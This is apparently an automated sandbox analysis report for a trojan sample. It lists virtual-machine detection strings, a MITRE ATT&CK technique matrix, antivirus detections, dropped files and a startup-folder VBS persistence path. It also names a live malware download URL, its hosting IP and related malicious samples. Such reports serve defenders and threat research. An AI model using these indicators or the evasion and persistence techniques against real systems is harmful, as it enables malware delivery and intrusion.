                  Source: Amcache.hve.5.drBinary or memory string: VMware20,1
                  Source: DisplayName.exe, 00000009.00000002.2773183696.00000000024D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                  Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.5.drBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.5.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: Amcache.hve.5.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Amcache.hve.5.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.5.drBinary or memory string: VMware PCI VMCI Bus Device
                  Source: DisplayName.exe, 00000009.00000002.2773183696.00000000024D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                  Source: Amcache.hve.5.drBinary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.5.drBinary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.5.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: Amcache.hve.5.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeMemory allocated: page read and write | page guardJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\DisplayName.exe "C:\Users\user\AppData\Roaming\DisplayName.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeQueries volume information: C:\Users\user\Desktop\3pwbTZtiDu.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeQueries volume information: C:\Users\user\AppData\Roaming\DisplayName.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.5.drBinary or memory string: msmpeng.exe
                  Source: Amcache.hve.5.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                  Source: Amcache.hve.5.drBinary or memory string: MsMpEng.exe

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information111
                  Scripting                  		Valid AccountsWindows Management Instrumentation111
                  Scripting                  		11
                  Process Injection                  		1
                  Masquerading                  		OS Credential Dumping1
                  Query Registry                  		Remote Services1
                  Archive Collected Data                  		11
                  Encrypted Channel                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/Job2
                  Registry Run Keys / Startup Folder                  		2
                  Registry Run Keys / Startup Folder                  		1
                  Virtualization/Sandbox Evasion                  		LSASS Memory211
                  Security Software Discovery                  		Remote Desktop ProtocolData from Removable Media1
                  Ingress Tool Transfer                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAt1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		1
                  Disable or Modify Tools                  		Security Account Manager1
                  Virtualization/Sandbox Evasion                  		SMB/Windows Admin SharesData from Network Shared Drive2
                  Non-Application Layer Protocol                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                  Process Injection                  		NTDS1
                  File and Directory Discovery                  		Distributed Component Object ModelInput Capture3
                  Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                  Obfuscated Files or Information                  		LSA Secrets12
                  System Information Discovery                  		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Side-Loading                  		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1588190 Sample: 3pwbTZtiDu.exe Startdate: 10/01/2025 Architecture: WINDOWS Score: 100 31 www.new.eventawardsrussia.com 2->31 41 Antivirus detection for URL or domain 2->41 43 Antivirus / Scanner detection for submitted sample 2->43 45 Multi AV Scanner detection for submitted file 2->45 47 6 other signatures 2->47 8 3pwbTZtiDu.exe 15 5 2->8         started        13 wscript.exe 1 2->13         started        signatures3 process4 dnsIp5 33 www.new.eventawardsrussia.com 5.23.51.54, 443, 49710, 49720 TIMEWEB-ASRU Russian Federation 8->33 23 C:\Users\user\AppData\...\DisplayName.exe, PE32 8->23 dropped 25 C:\Users\user\AppData\...\DisplayName.vbs, ASCII 8->25 dropped 27 C:\Users\...\DisplayName.exe:Zone.Identifier, ASCII 8->27 dropped 49 Drops VBS files to the startup folder 8->49 51 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 8->51 15 WerFault.exe 19 16 8->15         started        53 Windows Scripting host queries suspicious COM object (likely to drop second stage) 13->53 18 DisplayName.exe 14 2 13->18         started        file6 signatures7 process8 file9 29 C:\ProgramData\Microsoft\...\Report.wer, Unicode 15->29 dropped 35 Antivirus detection for dropped file 18->35 37 Multi AV Scanner detection for dropped file 18->37 39 Machine Learning detection for dropped file 18->39 21 WerFault.exe 3 21 18->21         started        signatures10 process11

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  3pwbTZtiDu.exe70%ReversingLabsWin32.Trojan.Leonem
                  3pwbTZtiDu.exe100%AviraHEUR/AGEN.1351837
                  3pwbTZtiDu.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Roaming\DisplayName.exe100%AviraHEUR/AGEN.1351837
                  C:\Users\user\AppData\Roaming\DisplayName.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Roaming\DisplayName.exe70%ReversingLabsWin32.Trojan.Leonem

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  https://www.new.eventawardsrussia.com/wp-includes/Wuuvrl.dat100%Avira URL Cloudmalware
                  https://www.new.eventawardsrussia.com0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  www.new.eventawardsrussia.com
                  		5.23.51.54
                  		truefalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://www.new.eventawardsrussia.com/wp-includes/Wuuvrl.datfalse
                    • Avira URL Cloud: malware
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://github.com/mgravell/protobuf-net3pwbTZtiDu.exe, 00000000.00000002.2613752688.0000000005C00000.00000004.08000000.00040000.00000000.sdmp, 3pwbTZtiDu.exe, 00000000.00000002.2611963383.0000000003933000.00000004.00000800.00020000.00000000.sdmp, 3pwbTZtiDu.exe, 00000000.00000002.2611963383.0000000003818000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://upx.sf.netAmcache.hve.5.drfalse
                        		high
                        https://github.com/mgravell/protobuf-neti3pwbTZtiDu.exe, 00000000.00000002.2613752688.0000000005C00000.00000004.08000000.00040000.00000000.sdmp, 3pwbTZtiDu.exe, 00000000.00000002.2611963383.0000000003933000.00000004.00000800.00020000.00000000.sdmp, 3pwbTZtiDu.exe, 00000000.00000002.2611963383.0000000003818000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://stackoverflow.com/q/14436606/233543pwbTZtiDu.exe, 00000000.00000002.2592427552.0000000002857000.00000004.00000800.00020000.00000000.sdmp, 3pwbTZtiDu.exe, 00000000.00000002.2613752688.0000000005C00000.00000004.08000000.00040000.00000000.sdmp, 3pwbTZtiDu.exe, 00000000.00000002.2611963383.0000000003933000.00000004.00000800.00020000.00000000.sdmp, 3pwbTZtiDu.exe, 00000000.00000002.2611963383.0000000003818000.00000004.00000800.00020000.00000000.sdmp, DisplayName.exe, 00000009.00000002.2773183696.00000000024D7000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://github.com/mgravell/protobuf-netJ3pwbTZtiDu.exe, 00000000.00000002.2613752688.0000000005C00000.00000004.08000000.00040000.00000000.sdmp, 3pwbTZtiDu.exe, 00000000.00000002.2611963383.0000000003933000.00000004.00000800.00020000.00000000.sdmp, 3pwbTZtiDu.exe, 00000000.00000002.2611963383.0000000003818000.00000004.00000800.00020000.00000000.sdmp, DisplayName.exe, 00000009.00000002.2788513573.00000000035F9000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name3pwbTZtiDu.exe, 00000000.00000002.2592427552.0000000002811000.00000004.00000800.00020000.00000000.sdmp, DisplayName.exe, 00000009.00000002.2773183696.0000000002491000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://stackoverflow.com/q/11564914/23354;3pwbTZtiDu.exe, 00000000.00000002.2613752688.0000000005C00000.00000004.08000000.00040000.00000000.sdmp, 3pwbTZtiDu.exe, 00000000.00000002.2611963383.0000000003933000.00000004.00000800.00020000.00000000.sdmp, 3pwbTZtiDu.exe, 00000000.00000002.2611963383.0000000003818000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://stackoverflow.com/q/2152978/233543pwbTZtiDu.exe, 00000000.00000002.2613752688.0000000005C00000.00000004.08000000.00040000.00000000.sdmp, 3pwbTZtiDu.exe, 00000000.00000002.2611963383.0000000003933000.00000004.00000800.00020000.00000000.sdmp, 3pwbTZtiDu.exe, 00000000.00000002.2611963383.0000000003818000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://www.new.eventawardsrussia.com3pwbTZtiDu.exe, 00000000.00000002.2592427552.0000000002811000.00000004.00000800.00020000.00000000.sdmp, DisplayName.exe, 00000009.00000002.2773183696.0000000002491000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious
                                    5.23.51.54
                                    		www.new.eventawardsrussia.comRussian Federation
                                    		9123TIMEWEB-ASRUfalse

                                    General Information

                                    Joe Sandbox version:42.0.0 Malachite
                                    Analysis ID:1588190
                                    Start date and time:2025-01-10 22:29:02 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 6m 34s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:12
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:3pwbTZtiDu.exe
                                    renamed because original name is a hash value
                                    Original Sample Name:5f031a5e3de3e7df29a8ef6adb4164a620592ed3a5ee8735d779984b9eafc4c5.exe
                                    Detection:MAL
                                    Classification:mal100.expl.evad.winEXE@6/12@1/1
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HCA Information:
                                    • Successful, ratio: 94%
                                    • Number of executed functions: 390
                                    • Number of non-executed functions: 37
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe

                                    Warnings

                                    • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                    • Excluded IPs from analysis (whitelisted): 52.182.143.212, 20.42.73.29, 4.245.163.56, 20.190.159.2, 13.107.246.45
                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                    • Report size getting too big, too many NtSetInformationFile calls found.
                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                    • VT rate limit hit for: 3pwbTZtiDu.exe

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    16:30:26API Interceptor2x Sleep call for process: WerFault.exe modified
                                    22:30:19AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DisplayName.vbs

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    5.23.51.54SpiMLVsYmg.exeGet hashmaliciousUnknownBrowse
                                    • ck12339.tmweb.ru/reciver.php

                                    Domains

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    www.new.eventawardsrussia.comPurchase Order A2409002.scr.exeGet hashmaliciousUnknownBrowse
                                    • 5.23.51.54
                                    NEW PURCHASE INQUIRY.scr.exeGet hashmaliciousUnknownBrowse
                                    • 5.23.51.54
                                    Order Ref SO14074.pdf.scr.exeGet hashmaliciousUnknownBrowse
                                    • 5.23.51.54
                                    rPO49120.scr.exeGet hashmaliciousUnknownBrowse
                                    • 5.23.51.54
                                    rPO49120.scr.exeGet hashmaliciousUnknownBrowse
                                    • 5.23.51.54

                                    ASNs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    TIMEWEB-ASRUPurchase Order A2409002.scr.exeGet hashmaliciousUnknownBrowse
                                    • 5.23.51.54
                                    NEW PURCHASE INQUIRY.scr.exeGet hashmaliciousUnknownBrowse
                                    • 5.23.51.54
                                    hK8z1AmKO1.exeGet hashmaliciousDCRatBrowse
                                    • 185.114.245.123
                                    arm7.elfGet hashmaliciousMirai, MoobotBrowse
                                    • 91.210.168.189
                                    bot.sh4.elfGet hashmaliciousMiraiBrowse
                                    • 91.210.168.190
                                    LaRHzSijsq.exeGet hashmaliciousDCRatBrowse
                                    • 92.53.106.114
                                    jew.m68k.elfGet hashmaliciousUnknownBrowse
                                    • 176.57.212.213
                                    2.exeGet hashmaliciousUnknownBrowse
                                    • 92.53.116.138
                                    Order Ref SO14074.pdf.scr.exeGet hashmaliciousUnknownBrowse
                                    • 5.23.51.54
                                    rPO49120.scr.exeGet hashmaliciousUnknownBrowse
                                    • 5.23.51.54

                                    JA3 Fingerprints

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    3b5074b1b5d032e5620f69f9f700ff0eJgE2YgxSzB.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                    • 5.23.51.54
                                    87J30ulb4q.exeGet hashmaliciousUnknownBrowse
                                    • 5.23.51.54
                                    lsc5QN46NH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                    • 5.23.51.54
                                    V7OHj6ISEo.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                    • 5.23.51.54
                                    jG8N6WDJOx.exeGet hashmaliciousAgentTeslaBrowse
                                    • 5.23.51.54
                                    2CQ2zMn0hb.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                    • 5.23.51.54
                                    6mGpn6kupm.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                    • 5.23.51.54
                                    SABXJ1B5c8.exeGet hashmaliciousMassLogger RATBrowse
                                    • 5.23.51.54
                                    v4nrZtP7K2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                    • 5.23.51.54
                                    xXUnP7uCBJ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                    • 5.23.51.54

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_3pwbTZtiDu.exe_4a7d76afb8a0566d887c9f67a7ca87aab926140_bc31016c_4efdbbb0-f279-4c5d-bb1a-f7f886de87fe\Report.wer

                                    Download File
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):65536
                                    Entropy (8bit):1.2187404242196935
                                    Encrypted:false
                                    SSDEEP:192:uNdcQ30BU/yaWSfMyIvzuiF4Z24IO8Wz:4dc7BU/yaFEDvzuiF4Y4IO8W
                                    MD5:16AF96E2757928D059E2AD388A3F04E5
                                    SHA1:78E8EDE983AC207F968275713E5148DDE31D3AF6
                                    SHA-256:954525F332C429BA817FA315F504F884E1844F7C5481BEECEF96E6A8ED5919AC
                                    SHA-512:391DB7622F46805D7DC53B2DDE192AA1102E4B9E161AC917EE3A1098C702795DD841D85F80C060F8A4F0690C19F895957CB5D26F28DAEDDF0989CFBABC690401
                                    Malicious:true
                                    Reputation:low
                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.0.1.8.2.1.9.7.0.1.0.7.7.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.1.0.1.8.2.2.1.1.2.2.9.5.3.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.e.f.d.b.b.b.0.-.f.2.7.9.-.4.c.5.d.-.b.b.1.a.-.f.7.f.8.8.6.d.e.8.7.f.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.0.9.2.c.6.e.6.-.d.6.6.d.-.4.3.6.7.-.a.2.4.e.-.c.f.e.c.4.3.d.2.3.0.4.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.3.p.w.b.T.Z.t.i.D.u...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.a.d.o.b.e.e.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.0.0.-.0.0.0.1.-.0.0.1.4.-.0.5.a.3.-.e.1.d.0.a.6.6.3.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.d.6.f.f.2.f.3.4.2.3.3.7.6.3.2.c.0.d.b.7.2.6.9.5.4.4.4.d.b.f.d.8.0.0.0.0.0.0.0.0.!.0.0.0.0.7.d.4.c.3.a.d.4.2.d.2.d.9.f.8.e.e.8.a.f.1.a.9.2.f.2.8.a.b.2.6.5.1.e.7.9.9.

                                    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_DisplayName.exe_7e90be3cd7ae5643337ae2e617f69346a3fe0e3_80484687_4ff92448-ea86-4502-97e3-25119065dbc5\Report.wer

                                    Download File
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):65536
                                    Entropy (8bit):1.215738761672065
                                    Encrypted:false
                                    SSDEEP:192:k8eBrJ30BU/KaGSfMyIRzuiF4Z24IO8B:HGrqBU/Ka1EDRzuiF4Y4IO8B
                                    MD5:4EE3E2BAF34D2E53EF76668CACA13C60
                                    SHA1:091467DA7D58151082E173AADFAAF94C31B158C5
                                    SHA-256:144ADAA86787D8684E1CF8051EDB17CC6A121B1606D9BD8530A378C530885397
                                    SHA-512:796457C64205113FA2EB7E150524C08112CC9D3F5E723B6063D0342904FA65F26252639E2E8C52AA1BAE88E9D3FEF37FD973CB9AC5B24AF00A8416615CFD0D75
                                    Malicious:false
                                    Reputation:low
                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.0.1.8.2.4.2.6.1.5.4.9.6.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.1.0.1.8.2.4.3.1.9.3.6.0.4.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.f.f.9.2.4.4.8.-.e.a.8.6.-.4.5.0.2.-.9.7.e.3.-.2.5.1.1.9.0.6.5.d.b.c.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.8.a.b.4.1.2.5.-.d.9.4.8.-.4.b.2.e.-.a.6.0.9.-.9.2.6.2.2.d.9.0.8.c.e.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.D.i.s.p.l.a.y.N.a.m.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.a.d.o.b.e.e.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.e.0.-.0.0.0.1.-.0.0.1.4.-.5.4.6.c.-.9.a.d.e.a.6.6.3.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.d.6.f.f.2.f.3.4.2.3.3.7.6.3.2.c.0.d.b.7.2.6.9.5.4.4.4.d.b.f.d.8.0.0.0.0.0.0.0.0.!.0.0.0.0.7.d.4.c.3.a.d.4.2.d.2.d.9.f.8.e.e.8.a.f.1.a.9.2.f.2.8.a.b.2.6.5.1.e.7.9.

                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER6AAF.tmp.dmp

                                    Download File
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Mini DuMP crash report, 15 streams, Fri Jan 10 21:30:20 2025, 0x1205a4 type
                                    Category:dropped
                                    Size (bytes):369503
                                    Entropy (8bit):4.5269973604113325
                                    Encrypted:false
                                    SSDEEP:6144:gcSmJuzkenVP2CZGyu+/syOV+xiSu04P0LB:9WznVP/wiUoxiSu0F
                                    MD5:867040F5A0742816E9845C3D53AC204C
                                    SHA1:EA02D196C71AFE917102ED4303267E171C98771E
                                    SHA-256:D6006DBFD17B7BFBFF514A318F37BF93B4D5F79583CA489B9F1125D4A2D9B669
                                    SHA-512:FDEC289D9677354DDDEB44BD7D514DCA98C87D9AA8158A36232AC8A71A795D04E215590BE829EA38FB4EC675209CF28349B8CB2B19E657E21CC7770BA4D2CAEC
                                    Malicious:false
                                    Reputation:low
                                    Preview:MDMP..a..... .......l..g............t............ ..........<...t*.......-...^..........`.......8...........T............Y..wI...........*...........,..............................................................................eJ......4-......GenuineIntel............T...........]..g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER6EC6.tmp.WERInternalMetadata.xml

                                    Download File
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):8414
                                    Entropy (8bit):3.6956520260989674
                                    Encrypted:false
                                    SSDEEP:192:R6l7wVeJ+G6Z6Y+nSU9XggmfZu2prt89bVnsfgHm:R6lXJX6Z6Y+SU9XggmfcpVsf9
                                    MD5:9F79D3FF84E91DAAEBC4B5AEE532B955
                                    SHA1:00542551C3DD190916BB67B11BAF2090C1FF188D
                                    SHA-256:C98A836E09033D99950BDA0D13BBD3D3945D5BDE67852031CDB46B364AB14F36
                                    SHA-512:74DD6CED8CCD85CD085BB0ABDEC0A163DAC585A657FCBD91464FD71B3748980296A0FD8BCC65DF9E11DF2701A942E22E2F9209C181474C6DB46AD4F676C192E4
                                    Malicious:false
                                    Reputation:low
                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.6.5.6.<./.P.i.

                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER6F64.tmp.xml

                                    Download File
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):4756
                                    Entropy (8bit):4.4713033661985415
                                    Encrypted:false
                                    SSDEEP:48:cvIwWl8zsoJg77aI9sAoXWpW8VYMYm8M4JsxsFpv+q8v66CRYI3xSd:uIjfuI7eAom7VUJsGK7CRYsxSd
                                    MD5:9D1D6762B7035C6CAD5F33C4B73BA3FA
                                    SHA1:0099A1CB1F4DEB25E730C0B3CD054BB2635ED37B
                                    SHA-256:BDC598B1B7430465C9E6A7F28691358D06D96143D22A190FDA4ED542064B0A9F
